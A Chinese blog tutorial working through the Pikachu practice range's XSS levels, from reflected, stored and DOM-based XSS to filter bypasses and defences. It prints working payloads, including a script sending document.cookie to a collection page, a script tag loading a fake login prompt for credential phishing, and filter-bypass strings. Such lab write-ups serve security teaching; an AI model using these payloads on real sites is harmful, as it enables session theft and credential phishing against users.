主頁 >  其他 > Pikachu靶場-xss詳解

Pikachu靶場-xss詳解

2021-10-31 07:35:46 其他

Picachu靶場-xss

  • 跨站腳本漏洞概述
  • 跨站腳本漏洞型別及測驗流程
  • 反射型XSS(post&get)
  • 存盤型XSS
  • Dom型XSS
    • xss-獲取cookie
    • xss-進行釣魚
    • xss盲打
    • xss的過濾和繞過
    • xss-htmlspecialchars
    • xss輸出在href和js中的案例
    • xss的防范措施

XSS-跨站腳本漏洞目錄

跨站腳本漏洞概述

Cross-Site Scripting 簡稱為“CSS”,為避免與前端疊成樣式表的縮寫"CSS"沖突,故又稱XSS,一般XSS可以分為如下幾種常見型別:
1.反射性XSS;
2.存盤型XSS;
3.DOM型XSS;

XSS漏洞一直是web漏洞中比較危害大的漏洞,在OWASP TOP10的排名一直處于前三的江湖地位,
XSS是一種發生在前端瀏覽器端的漏洞,所以其危害的物件也是前端用戶,
形成XSS漏洞的主要原因是程式對輸入和輸出沒有做合適的處理,導致“精心構造”的字符輸出在前端時被瀏覽器當作有效代碼決議執行從而產生危害,
因此在XSS漏洞的防范上,一般會采用“對輸入進行過濾”和“輸出進行轉義”的方式進行處理:
輸入過濾:對輸入進行過濾,不允許可能導致XSS攻擊的字符輸入;
輸出轉義:根據輸出點的位置對輸出到前端的內容進行適當轉義;
XSS 漏洞可以進行釣魚攻擊、用戶cookie獲取、前端js挖礦,甚至可以結合瀏覽器自身漏洞對用戶主機進行遠程控制

跨站腳本漏洞型別及測驗流程

1.跨站腳本漏洞型別
(1)反射型xss
互動的資料一般不會存在資料庫,一次性,一般出現在查詢頁面
(2)存盤型xss
互動的資料會存在資料庫中,永久性存盤,危害較大,一般出現在注冊、留言板等頁面
(3)Dom型xss
不與后臺進行互動,是一種通過dom操作前端代碼輸出的時候產生的問題,也是屬于一次性的,
2.測驗流程
要先了解XSS的測驗流程,首先我們需要先了解XSS的攻擊流程,
最主要的就是因為程式對輸入和輸出的控制不夠嚴格,導致腳本輸入后,在前端被當成有效代碼決議執行當作危害,
那么,我們的測驗流程也就有思路了
(1)我們首先在目標站點找到輸入點,比如查詢介面,留言板之類的,
(2)輸入一組特殊的字符+唯一識別字符,來看它原始碼,是否有對應的處理
(3)通過搜索定位到唯一字符后,結合唯一字符前后語法是否可以構成執行js的條件,也就是構造閉合
(4)提交構造的腳本代碼以及各種繞過姿勢,看看是否能執行,如果行,就說明存在XSS漏洞,

反射型XSS(post&get)

我們通過Picachu靶場來看看,xss到底是什么,
在這里插入圖片描述
根據我們前面的測驗流程,我們首先輸入一些特殊字符和唯一識別字符,我們來看看,
在這里插入圖片描述
我們在輸入框輸入以后,點擊提交
在這里插入圖片描述
根據我們的思路,來看一下頁面的原始碼
通過輸入唯一識別字符,我們能看到我們輸入的東西被輸出到了P標簽中
在這里插入圖片描述
我們輸入的東西好像被原封不動的輸出出來了,那么,假如我們輸入一段java script的代碼,它還是會原封不動的輸出嘛?
我們來試試
我們在輸入框輸入一段Java Script的代碼
在這里插入圖片描述
點擊提交
在這里插入圖片描述
沒錯,那這就說明存在XSS漏洞,這就是一個反射型的XSS,
我們來看它的原始碼
在這里插入圖片描述
我們輸入的東西被原封不動的輸出了出來,

存盤型XSS

存盤型的XSS與反射型的XSS一樣,但它是將腳本存在了后臺儲存起來,構成更持久的危害,也稱為永久性xss
話不多說,我們用實體來看
在這里插入圖片描述
按照慣例,在留言框中輸入特殊字符+唯一識別
在這里插入圖片描述
提交之后,發現它會一直存在在那里
在這里插入圖片描述
然后,我們接著輸入一段Java script的代碼,來看看效果如何,
在這里插入圖片描述
提交之后,發現彈窗,當我們重繪頁面的時候,會發現,會一直彈窗
在這里插入圖片描述
我們查看原始碼,還是沒有做任何的處理,

Dom型XSS

在這之前,我們先來了解一下什么是Dom,
DOM 是一項 W3C (World Wide Web Consortium) 標準,

DOM 定義了訪問檔案的標準:

“W3C 檔案物件模型(DOM)是中立于平臺和語言的介面,它允許程式和腳本動態地訪問、更新檔案的內容、結構和樣式,”
W3C DOM 標準被分為 3 個不同的部分:

·Core DOM - 所有檔案型別的標準模型
·XML DOM - XML 檔案的標準模型
·HTML DOM - HTML 檔案的標準模型

而html dom是HTML 的標準物件模型和編程介面
換句話來說,HTML DOM 是關于如何獲取、更改、添加或洗掉 HTML 元素的標準

HTML DOM 方法是能夠(在 HTML 元素上)執行的動作,
HTML DOM 屬性是能夠設定或改變的 HTML 元素的值,

也就是說dom就是一個前端介面,不與后臺互動

打開我們的Picachu
在DOM型xss中輸入框輸入1111,點擊click me!
在這里插入圖片描述
接著我們查看源代碼,看看它是怎么處理的
在這里插入圖片描述
這段Java script的代碼,我們看看是什么意思
首先它使用dom里面的document.getElementById獲取到了id=text的值
text 就是下面input 也就是我們輸入的內容,,
然后通過dom的操作,將我們輸入的內容拼接在了a標簽的href屬性中
接著a標簽會寫在id=dom的div標簽中

閑話不多說
我們來看看怎么搞
通過分析代碼,我們發現我們輸入的東西是str,而str又拼接在A標簽中,這樣的話,我們就有思路了
通過將前面A標簽閉合,來構造一個惡意代碼
在這里插入圖片描述
可以看到它代碼就是
在這里插入圖片描述

然后我們來閉合它
<a href = ’ 'οnclick=“alert(‘xss’)”> '>what do you see
簡單來說就是單引號閉合前面那個單引號
尖括號閉合a標簽
中間再來一個彈窗
然后把我們自己寫的拿出來
'οnclick=“alert(‘xss’)”>
我們來輸入試試
在這里插入圖片描述

按照我們之前的思路,我們輸入的東西會被拼接到a標簽中,然后它不做處理的話,就會執行我們的代碼,也就是onclick的話,會彈窗
點擊what do you see后
在這里插入圖片描述
這樣的話,它就是存在DOM型的xss漏洞

我們來看下一個
在這里插入圖片描述
同樣是在輸入框輸入1111點擊
在這里插入圖片描述
它彈出了一段話
我們看看它網頁的源代碼
在這里插入圖片描述
同樣是有一段Java script的代碼
簡單分析一下
它會將URL中傳參的內容獲取到,然后通過一個url的解碼,獲取到輸入內容并賦值給xss
然后將變數xss寫入a標簽的href屬性中
這樣的話,我們的思路和剛剛一樣
同樣是閉合a標簽構造代碼

還是輸入我們剛剛的腳本
'οnclick=“alert(‘xss’)”>
在這里插入圖片描述
點擊以后
在這里插入圖片描述
這里我們要注意的是
上面url里的東西

http://127.0.0.1/pikachu-master/vul/xss/xss_dom_x.php?text=+%27onclick%3D%22alert%28%27xss%27%29%22%3E#

如果將這段url發送給受害者,那么當他點擊連接的時候,就會執行我們構造的惡意的Java script代碼了,

大家也可以去試試別的代碼

xss-獲取cookie

我們先來了解一下get型xss利用
在用戶訪問xss頁面后,觸發腳本,然后會回傳帶有惡意js的頁面
然后用戶執行腳本,攻擊者就會獲取到cookie,然后偽造用戶登錄,造成破壞,

我們首先在下面的管理工具中搭建好要接收的cookie的后臺

在這里插入圖片描述

要將pkxss單獨放在WWW目錄下(pkxss是一個可以單獨使用的后臺)
接著我們修改config.inc.php中資料庫的密碼,與我們的資料庫保持一致
在這里插入圖片描述
安裝好以后
在這里插入圖片描述
有三個功能
在這里插入圖片描述
回到網站,我們根據之前的邏輯
當用戶訪問存在xss漏洞的站點,會觸發腳本,回傳帶有惡意的js的頁面
我們就可以執行腳本,獲取到用戶的cookie
獲取到的cookie呢,就在我們的pkxss網站中

這里要說一說這個網站的原始碼了
在這里插入圖片描述
大致就是先用get方式獲取cookie
然后將網站重定向到一個新的可信的網站
在這里插入圖片描述
這個就是將接受到的cookie進行一個查詢輸出

回到我們的get型xss中
我們之前做過,如果我們輸入一段Java script的alert代碼的話,就會進行一個彈窗
那么,我們這次輸出一個更加復雜的payload

<script>document.location = 'http://127.0.0.1/pkxss/xcookie/cookie.php?cookie='
+document.cookie;</script>

我們通過獲取到cookie并且傳到pkxss中

首先將這個文本框長度修改一下
在這里插入圖片描述
然后我們輸入那段代碼
在這里插入圖片描述
點擊提交之后,發現回傳到了127.0.0.1首頁
在這里插入圖片描述
接著我們來看一下后臺
在這里插入圖片描述
這樣的話,我們就接受到了用戶的cookie
接著我們將referer里的url復制,打開一個新的頁面
發現它會直接跳到首頁,并且在后臺也會獲取到它的cookie

這就是簡單的利用xss獲取用戶cookie

xss-進行釣魚

我們之間說過,反射型和存盤型一樣,只不過一個是一次性的,一個是永久儲存的
和反射型一個思路
那么我們就來試試存盤型來如何釣魚

還是打開pikachu,存盤型的頁面
在這里插入圖片描述
在我們pkxss中有一個xfish,里面有三個代碼

我們都看一下,
第一個
在這里插入圖片描述
簡單理解一下,就是會給出一個認證框
然后獲取用戶輸入的資料

第二個
在這里插入圖片描述
這個就是獲取到用戶的資訊

第三個
在這里插入圖片描述
和之前獲取cookie一樣,來查看獲取到的資訊

按照之前的思路,我們來寫一個payload

<script src="http://127.0.0.1/pkxss/xfish/fish.php"></script>

在留言版中寫下我們的代碼
在這里插入圖片描述然后點擊提交
在這里插入圖片描述
它就會提示讓用戶輸入用戶名和密碼
如果我們輸入后點確定的話,后臺就會接受到,
在這里插入圖片描述

xss盲打

什么是xss的盲打呢
就是說從前端無法判斷是否存在xss
只有后臺會看到前端輸入的東西
我們用pikachu來試試

在這里插入圖片描述
我們首先輸入資料

然后提交
在這里插入圖片描述
我們前端并不會看到

再試試我們之前的Java script代碼

在這里插入圖片描述
還是沒有反應

那我們登錄管理員后臺看看,點一下提示
在這里插入圖片描述

然后我們登錄
彈窗了!
在這里插入圖片描述
說明后臺沒有對輸入的東西進行判斷
管理員登錄以后還是會被X
這種危害還是很大的
如果輸入一段惡意的代碼
就可以獲取到管理員的cookie
那么 就可以偽造管理員登錄了,

xss的過濾和繞過

我們還是用之前方式打一遍
在這里插入圖片描述
提交它
在這里插入圖片描述
發現我們輸入的script被過濾掉了,說明它后臺對script進行了處理
那怎么辦
我們嘗試一下大小寫混合輸入script
在這里插入圖片描述
發現彈窗了,說明繞過了它的驗證
在這里插入圖片描述

這里總結一下幾種場景

1.前端繞過:
我們可以抓包重放,或者直接修改html前端代碼
2.大小寫:
有些措施會過濾掉你輸入的代碼,比如正則匹配
或者用一些查找的函式找到你的惡意代碼
可以嘗試大小寫混合輸入
3.拼湊:
有些后臺會把script這些東西進行替換,但有些邏輯只會拼湊一次
比如:

<sc<script>ript>alert('xss')</scr<script>ipt>

他會把中間的script給替換掉
但是剩下的依然是script
4.注釋干擾:
還是舉個例子

<scr<!?-test>ipt>alert('xss')</scr<!?-test>ipt>

在前端的時候,被注釋掉了
但是后臺不認識它,不會認為它是script的標簽,從而繞過
5:編碼
后臺會對特殊字符過濾,但是不一定認識編碼后的東西
但是在編碼的時候,要注意編碼在前端輸出的時候能被正常翻譯,否則不行,

xss-htmlspecialchars

htmlspecialchars函式是把預定義的字符轉化為html物體

我們依然是之前的方法,特殊字符、唯一識別字符
在這里插入圖片描述
提交之后
在這里插入圖片描述
接著 我們看看原始碼

在這里插入圖片描述
對一些特殊字符進行了處理,但是常規的specialchars函式不對單引號做出了
我們來寫一個payload
在這里插入圖片描述

提交之后 點擊

在這里插入圖片描述

xss輸出在href和js中的案例

href中:
在這里插入圖片描述
我們還是之前的邏輯,以此測驗一遍
接著就是Javascript代碼
在這里插入圖片描述
還是不彈窗,我們來分析一下原始碼

在這里插入圖片描述
之前的specialchars方法,這次還把單引號也給處理了
那怎么辦呢
其實,輸出在a標簽的href屬性里面,可以使用javascript協議來執行js
我們來執行一下這個payload
在這里插入圖片描述
提交之后,點擊下面的鏈接

在這里插入圖片描述
彈窗成功!
那怎么預防呢,我們可以對輸入的東西做要求
例如只輸入http之類的 然后再用specialchars處理
js中:

在這里插入圖片描述
提交
在這里插入圖片描述
接受是在script中

我們來構造一個閉合

'</script><script>alert( 'xss')</script>

在這里插入圖片描述
提交之后
在這里插入圖片描述
彈窗成功!

這里講輸入動態的生成到了js中,形成xss
Javascript里面是不會對tag和字符物體進行解釋的,所以需要進行js轉義

講這個例子主要是為了讓你明白,輸出點在js中的xss問題,應該怎么修?
這里如果進行html的物體編碼,雖然可以解決XSS的問題,但是物體編碼后的內容,在JS里面不會進行翻譯,這樣會導致前端的功能無法使用,
所以在JS的輸出點應該使用\對特殊字符進行轉義

xss的防范措施

總原則:
輸入做過濾,輸出做轉義

過濾:比如對輸入的東西做要求,如輸入手機號,只能輸入數字
轉義∶所有輸出到前端的資料都根據輸出點進行轉義,比如輸出到html中進行html物體轉義,輸入到JS里面的進行js轉義,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/342118.html

標籤:其他

上一篇:(Vulnhub練習)-- DC: 8滲透實戰

下一篇:【網路安全】Windows cmd的命令混淆學習思路

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more